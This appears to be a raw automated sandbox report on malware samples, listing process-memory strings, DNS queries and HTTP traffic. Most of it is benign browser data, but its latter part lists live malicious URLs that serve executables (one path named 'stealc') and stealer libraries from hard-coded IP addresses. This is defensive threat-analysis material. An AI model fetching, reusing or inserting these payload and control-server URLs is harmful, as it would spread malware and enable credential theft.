Source: firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.facebook.com (Facebook)
Source: firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.twitter.com (Twitter)
Source: firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/L equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3324674203.00000169D16D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3324674203.00000169D16D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3324674203.00000169D16D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3330455792.00000169D9B3D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3380737606.00000169D1B9F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3381137545.00000169CD9B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3332787650.00000169D9952000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com^partitionKey=%28https%2Cyoutube.com%29 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3385355519.00000169CBD3C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3370039347.00000169CBD3C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3411645544.00000169CBD3C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.comtype equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3346404548.00000169CE43E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: kmoz-nullprincipal:{8819dd4f-b125-44b1-94b8-14d53f0ecef8}?https://www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.2823704652.0000029FD3060000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ps://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.2823704652.0000029FD3060000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ps://www.youtube.com/accountUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows^itfW equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.2823296830.0000029FD2C60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: s://www.youtube.com/account --attempting-deelevationg equals www.youtube.com (Youtube)
Source: 5aa32fec17.exe, 00000017.00000003.2813243287.0000000002127000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: s://www.youtube.com/account" equals www.youtube.com (Youtube)
Source: 5aa32fec17.exe, 00000017.00000003.2813378419.0000000002150000.00000004.00000020.00020000.00000000.sdmp, 5aa32fec17.exe, 00000017.00000003.2813243287.0000000002127000.00000004.00000020.00020000.00000000.sdmp, 5177.bat.23.dr String found in binary or memory: set "URL=https://www.youtube.com/account" equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3346404548.00000169CE43E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: sq~moz-nullprincipal:{0ff20b06-08d8-4fb9-b708-544e32be49c5}?https://www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3397548903.00000169D1B86000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3152110944.00000169D1B82000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3341844231.00000169D1B86000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: tlsflags0x00000000:www.youtube.com:443^partitionKey=%28https%2Cyoutube.com%29 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3412223817.00000169CBD28000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3370039347.00000169CBD28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 00000021.00000003.3172465493.00000169CBD3C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3397548903.00000169D1B86000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3373672563.00000169CBCC1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3331445079.00000169D99EB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: x*://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: firefox.exe, 00000021.00000003.3329338474.00000169D9BEF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3231852517.00000169D9BEF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3066703967.00000169D9BDA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: x.S........[tlsflags0x00000000]www.youtube.com:443^partitionKey=%28https%2Cyoutube.com%29 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3329338474.00000169D9BEF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3231852517.00000169D9BEF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3066703967.00000169D9BDA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: xO^partitionKey=%28https%2Cyoutube.com%29,:https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3332787650.00000169D9952000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3398831276.00000169CC25E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3166300363.00000169CC25E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: xhttps://www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3329338474.00000169D9BEF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3398831276.00000169CC25E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3166300363.00000169CC25E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: xhttps://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3332787650.00000169D9952000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: xhttps://www.youtube.com^partitionKey=%28https%2Cyoutube.com%29 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3397548903.00000169D1B86000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3152110944.00000169D1B82000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3341844231.00000169D1B86000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: xtlsflags0x00000000:www.youtube.com:443^partitionKey=%28https%2Cyoutube.com%29 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3336782696.00000169D38FB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ~predictor-origin,:https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: www.youtube.com
Source: global traffic DNS traffic detected: DNS query: bzib.nelreports.net
Source: global traffic DNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global traffic DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: example.org
Source: global traffic DNS traffic detected: DNS query: ipv4only.arpa
Source: global traffic DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: youtube-ui.l.google.com
Source: global traffic DNS traffic detected: DNS query: accounts.youtube.com
Source: global traffic DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: spocs.getpocket.com
Source: global traffic DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: shavar.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global traffic DNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: play.google.com
Source: global traffic DNS traffic detected: DNS query: www.facebook.com
Source: global traffic DNS traffic detected: DNS query: www.wikipedia.org
Source: global traffic DNS traffic detected: DNS query: www.reddit.com
Source: global traffic DNS traffic detected: DNS query: dyna.wikimedia.org
Source: global traffic DNS traffic detected: DNS query: reddit.map.fastly.net
Source: global traffic DNS traffic detected: DNS query: star-mini.c10r.facebook.com
Source: global traffic DNS traffic detected: DNS query: twitter.com
Source: global traffic DNS traffic detected: DNS query: firefox.settings.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: prod.remote-settings.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: push.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: telemetry-incoming.r53-2.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: services.addons.mozilla.org
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: support.mozilla.org
Source: global traffic DNS traffic detected: DNS query: us-west1.prod.sumo.prod.webservices.mozgcp.net
Source: unknown HTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: */*Accept-Language: en-CHContent-type: text/xmlX-Agent-DeviceId: 01000A410900C4F3X-BM-CBT: 1696488253X-BM-DateFormat: dd/MM/yyyyX-BM-DeviceDimensions: 784x984X-BM-DeviceDimensionsLogical: 784x984X-BM-DeviceScale: 100X-BM-DTZ: 120X-BM-Market: CHX-BM-Theme: 000000;0078d7X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66EX-Device-ClientSession: 1D6F504B5A5A465DBDB84F31C63A581DX-Device-isOptin: falseX-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}X-Device-OSSKU: 48X-Device-Touch: falseX-DeviceID: 01000A410900C4F3X-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshldspcl40,msbdsborgv2co,msbwdsbi920cf,optfsth3,premsbdsbchtupcf,wsbfixcachec,wsbqfasmsall_c,wsbqfminiserp_c,wsbref-cX-MSEdge-ExternalExpType: JointCoordX-PositionerType: DesktopX-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-Search-CortanaAvailableCapabilities: NoneX-Search-SafeSearch: ModerateX-Search-TimeZone: Bias=-60; DaylightBias=-60; TimeZoneKeyName=W. Europe Standard TimeX-UserAgeClass: UnknownAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: www.bing.comContent-Length: 516Connection: Keep-AliveCache-Control: no-cacheCookie: SRCHUID=V=2&GUID=CE2BE0509FF742BD822F50D98AD10391&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231005; SRCHHPGUSR=SRCHLANG=en&HV=1696488191&IPMH=5767d621&IPMID=1696488252989&LUT=1696487541024; CortanaAppUID=2020E25DAB158E420BA06F1C8DEF7959; MUID=81C61E09498D41CC97CDBBA354824ED1; _SS=SID=1D9FAF807E686D422B86BC217FC66C71&CPID=1696488253968&AC=1&CPH=071f2185; _EDGE_S=SID=1D9FAF807E686D422B86BC217FC66C71; MUIDB=81C61E09498D41CC97CDBBA354824ED1
Source: global traffic HTTP traffic detected: HTTP/1.1 503 Service UnavailableContent-Length: 326Content-Type: text/html; charset=us-asciiDate: Fri, 26 Jul 2024 08:40:17 GMTConnection: closePMUSER_FORMAT_QS: X-CDN-TraceId: 0.9ac2d17.1721983216.12698009Access-Control-Allow-Credentials: falseAccess-Control-Allow-Methods: *Access-Control-Allow-Methods: GET, OPTIONS, POSTAccess-Control-Allow-Origin: *
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 2342Content-Type: text/htmlDate: Fri, 26 Jul 2024 08:44:17 GMTConnection: closePMUSER_FORMAT_QS: X-CDN-TraceId: 0.2aac2d17.1721983457.d93b1cfAccess-Control-Allow-Credentials: falseAccess-Control-Allow-Methods: *Access-Control-Allow-Methods: GET, OPTIONS, POSTAccess-Control-Allow-Origin: *
Source: explorti.exe, 00000012.00000003.3042588900.000000000127C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/cost/random.exe
Source: explorti.exe, 00000012.00000003.3042588900.000000000127C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/cost/random.exeW
Source: file.exe, 00000000.00000002.2433974980.000000002ED60000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2400608729.0000000002541000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/enter.exe
Source: file.exe, 00000000.00000002.2433974980.000000002ED60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/enter.exeM32
Source: file.exe, 00000000.00000002.2400608729.0000000002541000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/enter.exera
Source: file.exe, 00000000.00000002.2400608729.0000000002541000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/soka/random.exe
Source: explorti.exe, 00000012.00000003.3042588900.000000000125E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/stealc/random.exe
Source: explorti.exe, 00000012.00000003.3042588900.000000000125E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/stealc/random.exe393d
Source: explorti.exe, 00000012.00000003.3042588900.000000000125E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/stealc/random.exencoded
Source: explorti.exe, 00000012.00000003.3042588900.000000000125E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/stealc/random.exerb
Source: explorti.exe, 00000012.00000003.3042588900.000000000127C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/
Source: explorti.exe, 00000012.00000003.3042588900.000000000127C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/00003002
Source: explorti.exe, 00000012.00000003.3042588900.000000000127C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/15.113.19/3405117-2476756634-1003(
Source: explorti.exe, 00000012.00000003.3042588900.000000000127C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/238F-46AF-ADB4-6C85480369C7
Source: explorti.exe, 00000012.00000003.3042588900.000000000125E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php
Source: explorti.exe, 00000012.00000003.3042588900.000000000125E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php&b~
Source: explorti.exe, 00000012.00000003.3042588900.000000000127C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php(8)
Source: explorti.exe, 00000012.00000003.3042588900.000000000127C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php/
Source: explorti.exe, 00000012.00000003.3042588900.000000000127C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php0
Source: explorti.exe, 00000012.00000003.3042588900.000000000127C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php00003002
Source: explorti.exe, 00000012.00000003.3042588900.000000000127C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php5
Source: explorti.exe, 00000012.00000003.3042588900.000000000127C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php8
Source: explorti.exe, 00000012.00000003.3042588900.000000000127C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php=
Source: explorti.exe, 00000012.00000003.3042588900.000000000127C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpEscape
Source: explorti.exe, 00000012.00000003.3042588900.000000000127C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.php_
Source: explorti.exe, 00000012.00000003.3042588900.000000000127C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpaa32fec17.exe.mun
Source: explorti.exe, 00000012.00000003.3042588900.000000000127C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpe
Source: explorti.exe, 00000012.00000003.3042588900.000000000127C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpi
Source: explorti.exe, 00000012.00000003.3042588900.000000000127C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phps
Source: explorti.exe, 00000012.00000003.3042588900.000000000127C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpsm
Source: explorti.exe, 00000012.00000003.3042588900.000000000127C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpsoft
Source: explorti.exe, 00000012.00000003.3042588900.000000000127C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpu
Source: explorti.exe, 00000012.00000003.3042588900.000000000127C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/c0f9c30b4baed74c61395d7fac00b58987e8e8fda7df30804042ba5ce902415450#1.
Source: explorti.exe, 00000012.00000003.3042588900.000000000127C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.19/ows
Source: 7ca32398cd.exe, 00000014.00000002.2836006553.000000000266E000.00000004.00000020.00020000.00000000.sdmp, 7ca32398cd.exe, 00000025.00000002.3000379607.00000000025F2000.00000004.00000020.00020000.00000000.sdmp, 7ca32398cd.exe, 00000025.00000002.3000379607.00000000025BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31
Source: 7ca32398cd.exe, 00000014.00000002.2836612791.00000000026D2000.00000004.00000020.00020000.00000000.sdmp, 7ca32398cd.exe, 00000025.00000002.3000379607.00000000025F2000.00000004.00000020.00020000.00000000.sdmp, 7ca32398cd.exe, 00000025.00000002.3000379607.00000000025BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/
Source: 7ca32398cd.exe, 00000014.00000002.2836612791.00000000026D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/1
Source: 7ca32398cd.exe, 00000025.00000002.3000379607.00000000025BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.
Source: 7ca32398cd.exe, 00000025.00000002.3000379607.00000000025BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.php
Source: file.exe, 00000000.00000002.2433974980.000000002ED60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpE
Source: 7ca32398cd.exe, 00000014.00000002.2836612791.00000000026D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpJ
Source: 7ca32398cd.exe, 00000014.00000002.2836612791.00000000026F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpOoAS
Source: file.exe, 00000000.00000002.2433974980.000000002ED60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpR
Source: file.exe, 00000000.00000002.2433974980.000000002ED60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpX
Source: file.exe, 00000000.00000002.2433974980.000000002ED60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpf
Source: 7ca32398cd.exe, 00000025.00000002.3000379607.00000000025BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpj
Source: file.exe, 00000000.00000002.2433974980.000000002ED60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phplegram
Source: 7ca32398cd.exe, 00000025.00000002.3000379607.00000000025F2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phplg2
Source: file.exe, 00000000.00000002.2398151392.00000000005AD000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phposition:
Source: file.exe, 00000000.00000002.2433974980.000000002ED60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phps
Source: file.exe, 00000000.00000002.2426906219.0000000028C5C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpw2
Source: file.exe, 00000000.00000002.2433974980.000000002ED60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpx
Source: 7ca32398cd.exe, 00000014.00000002.2836612791.00000000026D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpz
Source: file.exe, 00000000.00000002.2400608729.0000000002541000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/7w
Source: file.exe, 00000000.00000002.2400608729.0000000002541000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/freebl3.dll
Source: file.exe, 00000000.00000002.2400608729.0000000002541000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/freebl3.dll$t
Source: file.exe, 00000000.00000002.2400608729.0000000002541000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/mozglue.dll
Source: file.exe, 00000000.00000002.2400608729.0000000002541000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/mozglue.dllCt
Source: file.exe, 00000000.00000002.2400608729.0000000002541000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/msvcp140.dll
Source: file.exe, 00000000.00000002.2400608729.0000000002541000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/nss3.dll
Source: file.exe, 00000000.00000002.2400608729.0000000002541000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/softokn3.dll
Source: file.exe, 00000000.00000002.2398151392.000000000046A000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2400608729.0000000002541000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/sqlite3.dll
Source: file.exe, 00000000.00000002.2400608729.0000000002541000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/vcruntime140.dll
Source: 7ca32398cd.exe, 00000025.00000002.3000379607.00000000025F2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/Fg
Source: 7ca32398cd.exe, 00000014.00000002.2836612791.00000000026D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/L
Source: 7ca32398cd.exe, 00000025.00000002.3000379607.00000000025F2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/Tg
Source: 7ca32398cd.exe, 00000014.00000002.2836612791.00000000026D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/X
Source: file.exe, 00000000.00000002.2400608729.0000000002541000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/cw
Source: 7ca32398cd.exe, 00000014.00000002.2836612791.0000000002698000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/h
Source: 7ca32398cd.exe, 00000014.00000002.2836612791.00000000026D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/n
Source: 7ca32398cd.exe, 00000025.00000002.3000379607.00000000025F2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/pData
Source: 7ca32398cd.exe, 00000014.00000002.2836612791.00000000026D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/v
Source: 7ca32398cd.exe, 00000025.00000002.3000379607.00000000025F2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/xg
Source: file.exe, 00000000.00000002.2398151392.00000000005AD000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://85.28.47.315499d72b3a3e55be.phposition:
Source: 7ca32398cd.exe, 00000025.00000002.3000379607.00000000025BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31s
Source: firefox.exe, 00000021.00000003.3250405380.00000169CD98C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearch/1.0/
Source: firefox.exe, 00000021.00000003.3250405380.00000169CD98C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearch/1.1/
